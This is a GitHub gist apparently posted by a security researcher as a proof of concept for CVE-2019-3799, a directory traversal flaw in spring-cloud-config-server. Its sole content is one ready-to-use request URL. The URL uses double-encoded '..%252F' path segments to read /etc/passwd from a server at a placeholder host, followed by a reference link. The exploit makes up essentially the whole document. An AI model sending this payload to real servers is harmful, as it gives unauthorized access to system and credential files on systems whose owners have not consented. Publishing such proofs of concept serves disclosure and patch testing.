Skip to content

Instantly share code, notes, and snippets.

@yassineaboukir
Created April 26, 2019 10:53
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save yassineaboukir/56ee6a133d03d5e455ddf7d4b0d81f2e to your computer and use it in GitHub Desktop.
Save yassineaboukir/56ee6a133d03d5e455ddf7d4b0d81f2e to your computer and use it in GitHub Desktop.
CVE-2019-3799: Directory Traversal with spring-cloud-config-server
http://example.com:8081/label/default/master/..%252F..%252F..%252F../etc/passwd
ref: https://twitter.com/chybeta/status/1118370858974760963?s=19
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment